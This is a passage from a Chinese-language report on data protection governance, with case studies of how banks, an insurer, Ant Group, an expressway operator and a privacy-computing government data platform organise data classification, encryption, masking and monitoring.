安全等数据保护相关的管理办法和实施细则。 (2) 技术控制:秉承业界全生命周期数据安全能力建设 范式,工商银行结合自身数据安全发展情况,梳理形成围绕数 据资产管理、数据生命周期安全、基础安全及监测响应四个方 面的全局数据安全能力视图。依托该能力视图, 对安全能力进 行整体统筹规划和落地实现,前期已通过搭建数据资产管理平 台、加密服务平台、身份认证与集中授权平台、合作方共享服 务平台、安全运营中心等大量专业技术平台为数据保护治理工 作提供技术支撑,如图 12 所示。 图 12 工行数据保护治理技术支撑体系 为满足规模化用数、“普惠”用数、跨机构共享用数等日益 旺盛的安全需求,工商银行持续提升数据保护治理能力, 围绕当 下数据安全热点问题, 倾力打造数据安全技术平台、联邦学习平 台、多方安全计算平台等,全面夯实全生命周期的数据安全技术 能力,为数据要素价值的释放提供安全服务保障。 例如: 打造数据安全技术平台, 沉淀智能敏感数据识别、动 态控权、统一数据脱敏引擎、数据水印溯源、全生命周期用数监 控审计五大核心功能, 提升数据安全服务的供给能力。工行数据 安全技术平台核心功能如图 13 所示。 图 13 工行数据安全技术平台核心功能 智能数据识别与分类分级。提供智能数据精准识别能力, 通 过工具对数据库实体表抽样扫描,自动完成打标,大幅降低人工 打标成本,提升敏感数据识别质量, 有效支撑数据资产的分类分 级工作。 动态控权。为各类用数场景提供细粒度的数据访问控制能力, 根据人员及数据分类分级结果, 提供敏感数据动态脱敏能力, 有 效支持各类人员的用数需求。 统一数据脱敏引擎。针对不同用数场景, 沉淀灵活多样的脱 敏算法, 为各类静态、动态脱敏场景提供统一的脱敏引擎。大幅 提升数据脱敏策略的布控效率, 以及脱敏数据的可用性。 数据水印溯源。针对结构化数据文件、各类文档、图片等多 媒体提供数据泄露后的溯源能力,保护外部共享数据, 有助于构 建安全合规的用数生态。 全生命周期用数监控审计。提供全生命周期用数监控视图, 包括敏感信息访问行为异常监控、风险预警等功能, 快速形成数 据全生命周期的用数保护能力。 4.总结分析 工商银行在数据安全体系建设实践过程中形成如下总结建 议: 组织建设、制度流程建设、技术工具建设、人员能力建设是 企业级数据安全体系建设的基础,需作为数据保护治理工作的首 要任务。 在开展数据安全能力提升过程中,需研读各种政策、法规, 将各项监管要求与企业自身业务相关联, 明确应用场景及能力建 设目标, 同时选取适合企业自身现状及发展的技术路线。 深入企业各类用数场景, 将数据安全技术与用数场景深度融 合, 加强数据安全风险的管控能力, 以点带面, 逐步迭代,落地 数据安全技防实体。 建立企业级应用数据安全能力标准化评价体系, 全面评估各 个业务条线、业务场景的数据安全风险, 实现企业数据安全的全 面合规可控。 案例二:光大银行数据保护治理实践 1.案例背景 随着我国数字化转型速度加快, 更多数据保护相关风险随之 浮现: 来自外部的威胁包括利用应用系统网络漏洞进行数据窃取、 篡改、破坏、删除, 及其他各类新型黑客攻击手段等; 来自内部 的风险包括内部员工有意或无意的不当操作造成数据泄露,高权 限业务人员对内部数据使用不当等; 同时,互联网、大数据、生 物识别、公有云技术等大大增加了数据的使用频率, 随之带来更 多风险。 为提升数据保护治理能力,光大银行正致力于研究推进“以 数据为中心”的全维度、全覆盖、全生命周期的数据保护治理体 系,并在数据安全和数据合规领域开展了全面细致的落地工作, 包括加强组织建设、丰富管理办法、打造安全名品、营造安全文 化。以上工作初见成效, 日后将持续为光大银行数字化转型升级 提供保障。 2.安全对策 针对目前数据保护治理现状与痛点, 围绕“打造以数据为中 心的保护治理体系, 保障数字化转型升级”的工作目标, 光大银 行数据保护治理小组推进“全维度、全覆盖、全生命周期”的三 维立体数据保护工作方案框架, 如图 14 所示。 图 14 三维立体数据保护治理体系框架图 “全维度”包含四个层次。依据《银行业金融机构数据治理 指引》中提出的“银行业金融机构应当结合自身发展战略、监管 要求等, 制定数据战略并确保有效执行和修订。”的要求,紧密 结合光大银行组织架构现状, 重点围绕组织建设、制度流程、技 术工具、基础保障四个层次构建光大银行数据保护治理体系。 “全覆盖”包含四个环境。结合数据保护中风险产生的环境, 全面覆盖光大银行生产、开发、测试、办公四个数据环境。 “全生命周期”包含六个阶段。针对数据泄露防护面临的问 题, 建立以数据保护为核心的动态保护机制。光大银行在数据生 命周期的采集、加工、传输、使用、存储和销毁六个阶段建构和 落地数据保护治理要求, 保障数据使用环境的生态健康。 3.保护治理实践 在数据保护治理工作目标的指引下,光大银行从组织架构、 管理制度、技术手段到人员培养等多方面构建数据保护体系, 围 绕“打造一流财富管理银行”的战略愿景,全面助力光大银行数 字化转型。 明确数据保护治理工作组织架构。光大银行已建立信息科技 与数据管理委员会、数据管理工作小组、各部门及其数据保护岗 的三层数据保护组织结构。 丰富数据安全管理制度。光大银行为加强数据保护管理, 提 升数据保护合规管理能力, 依据《中华人民共和国网络安全法》、 《金融数据安全 数据安全分级指南》《金融数据安全 数据生命 周期安全规范》等法律法规及国家标准规定, 制定了《数据保护 管理办法》明确四个环境的保护治理第一责任人及各部门数据安 全岗职责;形成覆盖六个阶段的全生命周期管理。针对数据保护 处理建立了保护技术标准《数据保护处理技术规范》。针对重要 且泄露风险较高的办公环境, 光大银行建立了《办公环境保护管 理细则》。针对其他管理制度提出数据保护治理要求, 将数据保 护治理和隐私保护要求落实到全行各管理环节中。 打造数据安全名品。光大银行通过打造“四大名品工具”, 将数据保护治理要求落地:一是数据侦探名品, 推进实现办公环 境敏感数据“零存放”;二是数据安全合规管理与分析系统名品, 推进敏感数据识别与监控,构建数据保护体系基础设施; 三是多 方安全计算平台名品, 依托产学研一体化,通过联合查询、联合 统计及联合建模,实现数据在共享中的“可用不可见”;四是办 公环境数据安全防护系统名品,通过数据安全分级、加密存储、 权限控制等安全管理,建设办公环境数据保护系统。 加强数据共享安全管理。光大银行构建全方位的数据共享管 理体系: 一是促进共享合规。根据法律法规要求签订与海外分行、 光大集团的数据共享协议,完善第三方合作协议模板; 二是落地 共享管理机制。全面梳理归纳数据共享合规要点,将安全要求落 实于第三方合作、外包管理、委托处理等各个业务场景。三是探 索多方安全计算场景下的合规。通过推进多方业务场景的落地实 施, 探索新技术下的数据安全合规实施路径, 为数据融合场景提 供合规保障。 培养数据保护文化。光大银行注重数据保护文化建设, 通过 多渠道、多形式落实数据保护宣传, 培养员工数据保护意识, 为 光大银行营造一个保障业务良好运转的数据保护环境。在具体操 作层面, 光大银行已经建立了从网络宣传、行内集中培训到现场 数据安全检查等三位一体的数据保护宣传检查机制。 4.总结分析 近年来, 光大银行在数据保护治理框架的指导下,持续开展 数据保护治理相关工作, 已搭建起较为完善的数据保护体系, 取 得初步成效。 一是全面贯彻落实监管要求,紧密配合监管机构推动数据确 权、共享、跨境流动等难题的研究与实践。从 2020 年开始,国 家陆续出台法律法规, 监管机构在数据安全及个人信息保护领域 持续加大监管与指导力度,为商业银行推动数据安全合规工作提 供了有力抓手。光大银行深入研究并落实了监管机构在个人金融 信息保护、金融数据安全分级、数据共享安全、生物识别等方面 各项要求,为全面建设奠定坚实的基础。 二是加速数据安全与个人信息保护的顶层设计, 推动银行业 数据治理组织职责优化与完善。数据安全与个人信息保护本质上 是一个以数据为对象, 基于国家、企业与个人主体数据权利, 除 数据管理与技术外还运用法律、道德伦理等多种手段的治理体系。 商业银行在数据安全合规的战略目标与顶层框架、组织架构、职 责分工等方面需不断优化与调整。 三是积极推进数据安全创新技术产学研合作交流,加大创新 投入与力度。自十九大中央提出数据是生产要素后, 为促进数据 要素依法有序地自由流动,构建数字化生态, 以隐私计算为代表 的数据安全创新技术得到了迅猛发展。与技术厂商、高等院校等 成立联合创新实验室, 将研究成果快速在实际场景落地实施, 提 升转化效率, 确保数据流动中的安全合规,加快创新技术的开发 与应用。 案例三: 中国人寿数据保护治理实践 1.案例背景 中国人寿以构建贯穿数据全生命周期的安全体系为总体目 标,将数据保护工作纳入网络安全整体工作框架内展开。集团公 司积极推进全集团数据保护体系的建设规划,形成数据保护相关 制度, 包括《中国人寿数据治理工作管理办法》《数据治理成熟 度专项提升工作方案》《中国人寿网络安全管理办法(试行)》 等。通过制度体系的建设与完善,一是明确了数据保护治理相关 部门职责、管理规范及标准等; 二是确立了数据全生命周期安全 管理机制,建立了数据从收集、加工、存储、交换、使用的流程 规范, 做到事前事中可控、事后可审计; 三是指导各成员单位建 立数据保护应急预案, 组织开展应急演练,确保系统服务异常时 数据的完整、准确和连续;四是要求各成员单位加强互联网业务 的数据保护管理,构建完善的防火墙、入侵检测、数据加密及灾 难恢复等互联网信息安全管理体系。 经过多年的数据保护治理实践, 中国人寿在数据保护方面取 得了明显进展。在取得进步的同时, 公司在数据分级分类保护方 面也存在相关工作落实不到位、不全面, 对于关键、重点、敏感、 客户隐私等相关数据缺少专项防护要求和保护措施的问题,需从 数据角度进一步健全安全防护体系。 2.安全对策 为进一步完善公司数据保护体系建设, 中国人寿参照《金融 数据安全 数据安全分级指南》 (JR/T 0197-2020)《个人金融信 息保护技术规范》(JR/T 0171-2020)等金融行业标准,制定了《中 国人寿保险(集团)公司数据分类分级管理办法》(以下简称《办 法》) ,明确了各成员单位需建立数据保护体系,制定数据分类 分级保护制度, 明确和细化各类数据的属主部门,压实数据保护 主体责任,落实数据分类分级保护措施等各环节工作内容,实现 数据在采集、传输、存储、使用、销毁等全生命周期的分级安全 防护。 3.保护治理实践 《办法》规定, 数据保护级别从高到低共分为 5 个级别。其 中, 5 级数据一般指影响国家安全的数据。4 级数据共 4 类, 包 括: 个人身份鉴别信息中的传统鉴别信息(密码等) 、弱隐私生 物特征信息(声纹等)、强隐私生物特征信息(指纹、虹膜等); 特殊风险标的信息(航空、航天、核电站等项目数据)。《办法》 要求对 4 级数据执行严格的安全管理, 如在数据库中需要进行报 文级加密存储, 数据传输需要信道加密, 在个人电脑非必要不存 储, 使用完成后应及时予以清除等。3 级数据共 42 类,包括客户 类信息 11 项、业务类信息 10 项、经营管理类信息 17 项、监管 数据报送信息 4 项。对 3 级数据实行较为严格的安全管理, 如 3 级数据对外传输应获得数据归属部门审批同意,传输过程需要进 行报文级加密, 系统展示需脱敏处理, 并采取多因素认证或二次 授权认证等机制。此外, 《办法》还对共 119 类 2 级数据、共 17 类 1 级数据及其安全管控要求进行了具体规定。 《办法》还明确了数据保护管理的基本原则,包括: 依法合规原则。数据的采集和应用应满足国家法律法规、行 业标准及监管政策等有关规定, 确保数据采集和使用的合法性和 正当性。 选择同意原则。在向个人主体进行数据采集和处理前, 征得 其授权同意, 并明示数据采集和处理的目的、方式、范围、规则 等。 最小化原则。数据的采集应遵循最小必要原则; 数据的存储 应根据内外部管理要求满足最小时限要求;数据的使用应遵循满 足开展业务所必需的最小权限。 全程可控原则。应通过与数据保护级别相匹配的安全管控机 制和技术措施, 确保数据在全生命周期各阶段的保密性、完整性 及可用性, 避免数据在全生命周期里的未授权访问、破坏、篡改、 泄露或丢失等。 动态控制原则。数据的安全控制策略和安全防护措施不应是 一次性和静态的,应可基于业务需求、安全环境属性、系统用户 行为等因素实施实时的和动态的调整。 权责一致原则。明确数据保护防护工作的相关部门及其职责, 有关部门和人员应积极落实相关措施,履行数据安全职责。 4.总结分析 《办法》的出台,为中国人寿各成员单位建立数据分类分级 管理制度和标准、深入开展数据保护工作提供了指导性意见, 如 寿险公司开展了客户信息的三级分类工作,广发银行按照高敏、 敏感和一般三个等级开展全行数据分级安全管控,中国人寿全集 团数据保护体系得到进一步巩固和完善。 案例四:蚂蚁集团数据保护治理实践 1.案例背景 数据保护治理作为企业数据安全的重要工作内容,近年来愈 发得到重视。蚂蚁集团在企业数据保护治理实践中总结发现, 当 前数据安全保护治理工作主要存在如下难点与挑战: 一是缺少来自组织高层的战略级重视。组织层面的重视程度 不够, 导致各类监管合规要求难以充分对标, 数据保护管理职责 不明确、问责不清晰, 制度流程趋同化、落地性差, 数据保护各 方面资源支持不到位,严重影响数据保护工作开展。 二是数据保护管理能力存在缺失。主要体现在: 流程规范追 求大而全,内容过于宽泛不具有落地性; 教育培训流于形式、效 果差, 人员意识提升难; 管理手段一刀切,缺少对实际执行成效 的感知; 安全设计理念缺失导致规划建设阶段未充分考虑数据保 护需求, 需要大量依赖事后补救和改造; 数据保护治理体系一成 不变, 难以应对持续变化的新要求, 数据保护治理缺少评估与持 续提升的能力。 三是数据保护技术精细度不够。首先, 由于数据本身的多样 性和复杂的流转关系等, 对于数据资产和流转的准确刻画难。其 次, 对于大规模数据使用过程中复杂的访问和调用关系, 难以做 到精细粒度的确权、鉴权与管控。此外, 数据合作和共享场景下, 数据依法合规安全利用也需要一定的技术突破来保障。 四是数据保护运营和风险差异化治理能力不足。企业数据保 护治理工作繁杂,不能过度依赖人工治理,需要加强数据保护平 台化运营能力建设, 提升治理效率和准确性。此外, 针对内外部 不同风险场景不能仅依靠同质化的管理和技术手段,需要在治理 实践中形成差异化的治理机制。 2.安全对策 为有效应对企业数据保护治理实践中的难点痛点问题, 蚂蚁 集团不断提升数据保护治理水平、总结经验, 逐渐形成了一套完 备、易落地、可度量、持续提升的数据保护复合治理模式,从数 据保护战略、数据保护运营管理、数据保护治理科技三个方面建 设与强化企业数据保护治理能力,如图 15 所示。 图 15 蚂蚁集团数据保护复合治理模式 (1)数据保护战略:成立了蚂蚁集团隐私保护及数据安全 委员会, 从集团层面明确数据保护对于企业生存发展的战略性意 义,制定企业数据保护方针,对数据安全制度流程、组织架构、 人员配备等进行不断优化完善, 持续加强技术研究与关键能力储 备。 (2)数据保护运营管理:强调数据的关键驱动作用,提升 人员的主动参与效应,依托于基线设定、心智运营、原生设计、 安全度量、可证溯源、红蓝对抗、测评认证等丰富的治理环节, 从不同的侧重领域加强数据安全管理工作,实现数据保护治理效 果可度量,利用各环节的串联、互补、联动与反馈,促进数据保 护治理能力的复合叠加、持续优化。 (3)数据保护治理科技:以安全平行切面、密码基础设施、 安全可信环境、终端安全等系统能力, 数据资产识别、数据血缘 图谱、异常访问检测等算法能力,以及准实时精准检索、压缩索 引、异构数据提取等数据能力作为底层基础能力,从全息资产画 像、深度安全防护、智能安全运营、隐私保护与隐私计算等领域 构建全方位、体系化的产品能力,为数据安全复合治理提供技术 支撑。 数据保护复合治理强调系统性、落地性, 通过对治理框架搭 建中战略、管理和技术进行统筹规划设计,并强化治理过程的联 动, 实现了安全与业务复合、管理与技术复合,发生化学反应, 形成治理合力,充分发挥复合协同效能。 3.保护治理实践 数据安全运营管理是蚂蚁集团数据保护治理模式的关键创 新, 其强调充分发挥数据的关键驱动作用,提升人员的主动参与 效应,通过可执行安全基线、互动式心智运营、原生式数据保护、 全景式安全度量、可自证溯源处置、测评认证、红蓝演练各环节, 从不同侧重领域解决数据保护治理的各类难点问题。同时,通过 各环节之间的串联、互补、联动与反馈, 促进数据保护运营管理 能力的持续提升,数据保护运营管理如图 16 所示。 图 16 数据保护运营管理 (1)可执行安全基线在安全制度和规范的基础上,针对组 织重点关注的安全要求, 通过清晰、明确、无歧义的规则化表达 和指标化映射方式,建立可执行、可度量的安全基线。 (2)互动式心智运营侧重于对人员安全心智和能力的提升, 通过运营目标拆解、运营渠道有效触达以及设置激励机制等方式, 提升心智运营的交互式体验,将被动的知识灌输转变为安全意识 与能力的主动提升,帮助人员形成良好的数据安全心智。 (3)原生式数据保护侧重于在产品研发过程中, 通过设置 管理流程机制和安全技术能力等方式将数据保护要求前置,保证 产品发布前已采取必要充分的数据保护措施,满足数据安全风险 可控的要求,推动数据安全成为产品的原生能力。 (4)全景式安全度量通过设计安全度量指标、度量模型、 度量算法等,建立覆盖重点安全要求和安全基线的安全度量体系, 对人员、系统、数据资产等的安全风险态势与安全要求符合程度 进行准确度量, 实现安全态势持续监测、安全风险准确定位和安 全水位直观呈现,并面向不同风险关注群体从不同视角呈现度量 结果,为安全决策提供参考。 (5)可自证溯源处置基于应急响应、安全审计等工作机制, 强化溯源过程可证能力建设,加强对于安全事件和责任人员的应 急处置与审计问责,形成数据安全风险与事件的闭环处置。 (6)测评认证通过开展内部安全认证与外部测评认证工作, 对组织的数据安全能力进行评估。首先, 强化组织内部认证体系 建设, 包括针对特定角色/岗位/权限人员的专项认证、针对数据 处理产品组件的产品认证, 以及面向业务的安全认证等。同时, 通过组织和开展第三方测评认证,对数据保护治理能力和水平等 进行客观评价, 为数据保护治理的持续改进提供重要依据。 (7)红蓝演练通过开展以数据为主体的红蓝演练,以定制 化攻击的方式检验安全防护能力与水平, 从攻防视角验证数据安 全防护体系的有效性, 促进未知安全风险的及时排查, 达到以攻 促防、攻防相长的效果。 最后, 数据保护运营管理的各环节不是彼此孤立的, 环节间 可以形成有效的串联、联动、互补和反馈。例如,依托于安全心 智, 可以对安全基线进行持续的全员意识宣传和能力建设;通过 对人员、系统等的安全度量, 可以对安全基线、安全心智等的实 际效果进行感知;溯源处置环节的经验总结, 可以为安全基线的 制定和安全心智的建设提供很好的输入和反馈等。 4.总结分析 通过应用数据保护复合治理模式,从数据保护战略出发, 强 化数据保护运营管理机制落实, 加大数据保护治理技术研发与应 用,蚂蚁集团取得了良好的数据保护治理成效: (1)数据保护战略得到集团层面的充分重视,数据保护治 理组织架构基本完善,数据保护重要性已凝聚成全员共识。 (2)通过数据保护运营管理的深入实施,数据保护治理能 力得到了持续提升,在以下几方面充分体现: 安全基线的规则化定义有效降低了理解和执行层面的偏差, 提升制度落地性,数据保护和安全合规得到充分保障。 强制全员通过数据安全认证, 安全心智水平不断提升, 数据 违规操作、人员异常行为等发生频率显著降低。 安全理念贯穿了管理流程与安全能力设计,产品在规划、设 计、开发和运营全周期需满足安全要求、集成安全模块、通过安 全评审, 实现了安全能力的有效融合, 避免了不必要的事后补救 和改造。 通过安全度量对数据保护水位进行全方位衡量, 实现了系统、 人员、应用、数据资产等安全风险的准确感知和快速定位,度量 结果显示数据保护总体水位得到了明显持续的提升。 通过溯源处置能力的持续建设, 安全策略定义更加充分、更 加贴近场景, 安全事件发现能力、处置效率、经验总结与提升等 均得到了明显加强,各类安全事件的发生频次明显降低。 测评认证、红蓝演练等的开展, 从认证和攻防的全局角度对 数据保护水平进行客观准确的评价, 通过不断的迭代反馈,未知 风险发现能力显著提升, 安全薄弱环节持续改进。 数据保护治理科技不断提升, 数据资产与流转刻画、数据安 全防护与管控、隐私保护与隐私计算等数据保护技术按照技术路 线规划持续推进。 以安全度量环节中面向全体员工的量化评价机制安全基线 分为例, 通过对人员的数据保护意识与水位进行准确刻画,帮助 员工更直观地感知数据保护要求与责任。从安全基线分的实际应 用结果来看,安全基线分对于员工数据保护意识的提升起到了较 大的推动作用。首先, 全员安全基线分的平均分稳步上升,呈现 向满分不断趋近的态势。同时, 低分数段人员(80 分及以下)数 量下降趋势明显,半年内总体下降幅度超过 85%。安全基线分运 营成效如图 17 所示。 图 17 安全基线分运营成效 附录 B:其他行业数据保护治理实践案例 案例一:沪杭甬高速工业互联网数据保护治理方案 1.案例背景 交通运输是国民经济中的服务性、基础性、战略性和引领性 产业, 建设交通基础设施数字信息化平台,提升交通基础设施的 全要素、全周期数字化水平是交通运输产业发展的大势所趋。在 完成沪杭甬高速系统数字信息化平台建设后,针对平台中海量数 据的采集、汇总和使用等场景,需要在数据泄露、数据隐私保护、 数据权限控制等关键环节进一步建设和提升数据保护能力。 2.安全对策 沪杭甬高速公路系统对交通事件、路网运行状态、紧急事件、 气象状态、高速公路运营状况、高速公路养护状况、交通流量、 收费数据等进行了海量数据的采集,并实施了决策分析,实现人、 车、路网及周边环境智能协同运转, 达到“保障安全, 提高效率、 改善环境、节约能源”的目标。同盾团队在实施过程中, 产生的 数据安全问题进行了逐一解决, 在数据采集、数据传输、数据存 储、数据处理、数据交换共享与安全披露、数据销毁等重要环节 进行了数据保护。 (1) 数据采集 安全问题:数据收集过程存在丢失、不完整风险,以及泄漏 等风险。 安全措施: 提供对数据包的进/出网络接口、协议(TCP、UDP、ICMP,以 及其他非 IP 协议)、源地址、目的地址、源端口、目的端口, 以及时间、用户、服务(群组)的访问过滤与控制功能,对进入 或流出的数据进行安全检查,只允许符合安全策略的数据包通过, 同时对连接网络的流量、内容过滤, 对采集过程和采集结果进行 校验、监控。 边界安全隔离与可信数据交换, 可完成指挥信令的双向流动, 例如国地税数据单向流入沪杭甬本地数据库的安全隔离与控制。 采用两头落地的“数据交换”模式, 实现省厅与各级地市之间基 于文件和数据库同步的数据安全交换和高强度隔离。 (2) 数据传输 安全问题:网络不稳定导致数据缺失, 网络被攻击导致数据 被窃取或篡改。 安全措施: 设置流量安全检测机制,对进出流量进行全量、双向分析, 重点对 TCP、UDP、HTTP 流量中的异常行为、攻击行为进行检测 和防御。并通过分析,能够展示业务的访问情况、WEB 攻击情况、 访问者来源情况, 以及流量图等重要信息。 数据传输完整性与机密性保护, 通过在不可信信道上构建安 全可靠的虚拟专用网络,为数据传输提供机密性和完整性保护, 以及数据源认证、抗重放攻击等安全保障,并且支持采用身份认 证、访问控制,以及终端安全控制技术, 为云端数据仓建立安全 屏障。 提供全方位的加解密和数字签名体系, 可供数据方自主选择 针对隐私数据的加解密安全措施。支持国密算法和国际标准算法。 (3) 数据存储 安全问题:机器或机房故障导致数据丢失或不可用风险, 恶意查询或拖库导致数据泄漏风险。 保护措施: 提供数据自动容灾备份机制。基于数据多副本备份、自动存 储容错、系统错误监控、故障自动迁移等技术, 确保数据的安全 性,数据可用性达到 99.99%。 支持租户资源隔离, 包括 CPU、内存等,确保不同租户间数 据的安全;支持基于 ACL 的用户权限管理,可以配置灵活的数据 访问控制策略, 防止数据越权访问;支持 LDAP、Kerberos 协议, 基于访问控制列表 ACL 支持灵活的基于角色或用户的安全控制。 提供物理文件透明加密机制, 保障数据的物理层安全, 有效 防范拖库攻击, 即便发生拖库攻击或操作系统级攻击(OS-level attacks),攻击者在无密钥的情况下也无法读取出数据明文。 (4) 数据处理 安全问题:系统不稳定、权限控制不到位、处理过程执行不 当等可能造成数据丢失、错误及泄漏等安全风险。 保护措施: 限制对系统具有管理权限的人员采用虚拟桌面接入系统管 理平台进行操作以保障系统资源安全。虚拟桌面将具体操作人员 与系统资源有效隔离, 通过定义策略可控制操作人员权限,避免 操作人员对系统资源造成毁灭性破坏。通过虚拟桌面可有效记录 管理员所有操作,并实时汇总至安全审计和控制模块, 起到事中 控制、事后追溯的目的。 建立一套完整的安全运维服务机制,通过定期对系统运维发 现并修复信息系统中所存在的安全隐患, 降低安全隐患被非法利 用的可能性,并在安全隐患被利用后及时加以响应。 统一管理安全审计系统、接入认证系统、身份认证系统、网 络防病毒系统、漏洞扫描系统、应用安全防护系统、数据安全防 护系统和安全管理平台等, 实现实时监控、统计分析、配置管理、 密钥管理、统一身份认证、资源授权及访问控制管理、网络安全 审计、主机安全审计、数据库安全审计、应用系统安全审计等一 系列功能的集中分析和展现。 (5) 数据交换共享与公开披露 安全问题:数据获取过程管理不善、数据获取范围过大、数 据利用方式错误、数据服务遭遇恶意攻击等造成严重的数据泄漏 风险。 保护措施: 实施访问隔离措施, 实施数据安全等级划分, 提供数据访问 授权模型,提供全局数据视图和私有数据视图, 提供从应用层到 数据层统一的权限访问控制。 监视以下攻击行为:端口扫描、强力攻击、木马后门攻击、 拒绝服务攻击、缓冲区溢出攻击、IP 碎片攻击和网络蠕虫攻击 等。 设置审计机制,提供对被授权人员和系统的网络行为进行解 析、分析、记录、汇报的功能,以帮助用户事前规划预防、事中 实时监控、违规行为响应、事后合规报告、事故追踪回放,保障 网络及系统的正常运行。 设置探测器,可对内部网络中出现的内部用户未通过准许私 自联到外部网络,以及外部用户未经许可违规接入内部网络的行 为进行检查和控制。 (6) 数据归档与销毁 安全问题:对数据缺少妥善的分类和管理,造成重要数据缺 少保障甚至导致数据泄漏风险。 保护措施: 在对系统中海量数据形态、数据分布、数据处理流、网络访 问行为、安全事件等综合分析的基础上, 构建的全局的、可视的 数据安全展示与管理平台,定期审计、处理数据的归档及过期销 毁。 采用可视化技术对系统中海量数据分类、数据特征、数据分 布、敏感数据热点区域、访问热点区域、异常区域、数据防护体 系作用次数进行可视化展示,便于管理者充分了解系统中数据资 源的全局态势。 3.总结分析 从数据保护战略出发, 强化数据保护闭环管理机制落实, 加 大数据保护治理技术研发与应用,良好地保护了客户的数据。在 客户数据的全生命周期里,对各个环节可能出现的数据保护问题 进行有效的数据保护工作。 由于高速系统数字信息化平台有多个公司共同参与建设, 在 数据保护策略的制定上缺乏组织建设和制度流程建设方面的经 验。对于如高速这类工业互联网的行业, 数据保护治理和措施仍 处于初步探索阶段。 案例二:基于隐私计算技术的政务数据保护和应用 1.案例背景 近年来, 随着电子政务建设的不断发展, 政府部门在履行行 政职能、管理社会公共事务的过程中, 已积累了大量与公众的生 产、生活息息相关的数据。政府向公众开放其所拥有的数据, 特 别是公共服务类数据的开放, 不仅有利于全社会更广泛、更高效 地利用政务数据创造社会经济价值,还能帮助政府提高自身透明 度, 提升执政治理能力和效率。因此, 国家部委先后出台《促进 大数据发展行动纲要》《关于推进公共信息资源开放的若干意见》 等指导文件,要求政府数据开放、扩大信息公开。 但另一方面, 近年来数据安全攻击与事件层出不穷, 数据安 全总体形势空前严峻。我国相继出台了《数据安全法》《个人信 息保护法》等一系列法律法规, 旨在从国家立法层面更好地应对 隐私数据非法泄露和滥用问题。如何在政务数据安全合规与开放 利用之间取得更好的平衡,是促进政务数据应用的核心需求。 2.安全对策 为了更高效地利用政务数据创造社会经济价值, 在扩大开 放力度的同时保障政务数据的数据安全, 某地市地方金融局、 金融机构和地方政府部门基于隐私计算技术,共同构建了银政 企中小微企业金融服务平台。以优化中小微企业融资环境为目 标,以市场需求为导向, 以聚焦服务实体经济、聚力机制技术 创新、聚合资源有效供给为抓手,实现了政务数据应用与融资 一体化的大型综合性服务平台, 如图 18 所示。 图 18 基于隐私计算技术的政务数据保护和应用 为有效解决政务数据开发过程中的数据安全治理难点问题, 整体平台的构建遵循国家、地方、行业相关法规和标准, 贯彻等 级保护和分域保护的原则;管理与技术并重, 互为支撑, 互为补 充,相互协同, 形成有效的综合防范体系: 一是在技术策略方面。按照确定的安全策略实施强制性的安 全保护, 使数据信息免遭非授权的泄露和破坏, 保证较高安全的 系统服务。 政务数据以不同的存储方式存储在不同的政府部门, 通常所说的数据融合需要将不同机构的数据融合在一起,存在极 大的隐私泄露风险,通过隐私计算技术在逻辑上将不同区域的数 据进行融合关联,物理上数据仍存在各自机构中,结合零知识证 明、不经意传输、隐私求交等多种技术思想, 在保证数据信息不 被泄漏的情况下,实现数据的关联和计算,保障各个合作机构的 合规安全,为科学分析、预测和决策提供底层数据能力支持。 二是在管理策略方面。建立完整的信息系统安全管理体系, 对安全管理过程进行规范化的定义。根据实际安全需求, 成立安 全管理机构, 配备专职的安全管理人员, 实行专项工作专人负责 的责任制度。针对政务数据的密级和开放额目标,制定数据分类 分级制度,将政务数据类别、分类分级制度映射到对应的系统平 台开放能力上, 构建从制度到技术相结合的综合管理路径。 3.保护治理实践 以银政企中小微企业金融服务平台为基础,金融机构、政府 部门等各参与方将需要的数据资源与平台各自的安全计算节点 进行对接后, 银行机构(数据需求机构, 拥有标签数据) 发起模 型训练项目, 其他数据提供方配置待训练的特征维度数据,基于 平台提供的算法进行模型训练和规则计算,完成金融产品定制模 型的设计。金融机构通过跨层级、跨部门、跨地域的信用信息互 联互通, 健全优化金融机构与企业信息对接机制,实现资金供需 双方线上高效对接, 提高企业金融服务的可得性、覆盖率和满意 度,为营造金融机构“敢贷、愿贷、能贷”氛围夯实信用基础。 一是数据隐私安全的银行+政府多方联合建模。 银行机构作 为机器学习模型需求方,基于企业金融信贷记录数据( y ),政 府提供企业在工商、税务等政务数据能力(x),结合外部商业 化数据, 多方机构在平台上进行联合机器学习建模。在隐私计算 提供的数据安全保护能力之上, 政府和与银行机构原始数据不出 私域, 更加安全合规; 银行利用政务数据的底层原始数据加工特 征,数据维度更丰富、信息价值损失更少,建立的模型效果更好。 同时,利用平台的可视化交互界面完成机器学习模型的自动训练、 部署、调用与迭代,大大缩短了银行机构与政务数据的对接周期, 提高了数据应用环节的工作效率。银行机构基于政务数据打造了 定制化的金融产品,服务当地目标中小微企业。 二是政务数据安全联合统计分析。为了辅助政府决策, 提升 公共服务水平, 政府部门需要把原来分散在各部门的碎片化的数 据聚合在一起,深层次挖掘数据价值后,反作用于政府决策支撑, 进一步提升社会治理和公共服务水平。数据分析、挖掘的过程中 需要和外部数据相结合, 提高统计分析的效果, 但数据源方无法 共享出其原始数据,数据隐私安全的联合统计分析可以使得在不 透露数据源方原始数据的情况下,完成数据的联合统计。政府机 构、各委办局、外部数据提供机构共同完成安全多方计算任务, 由需求发起方发送计算任务申请认证与计算指令,参与计算的数 据将以密文的形式, 结合秘密分享、不经意传输等多种技术传输 和计算。计算结束时, 各方汇聚得出计算结果, 保证在传输和使 用过程中隐私数据信息不被泄漏。 4.总结分析 平台基于隐私计算技术实现了政务数据的保护和开发, 践行 普惠金融,助力实体经济,进一步提高了金融服务质量及效率。 基于隐私计算技术, 政务数据将在服务国家战略、服务改革、服 务实体经济、服务民生、服务社会治理等领域创新应用, 进一步 促进数字经济发展,建立健全公共信用信息和市场信用信息的融 合共享、开发和监管机制,确保政务数据共享和市场化应用工作 的安全可控。
standards
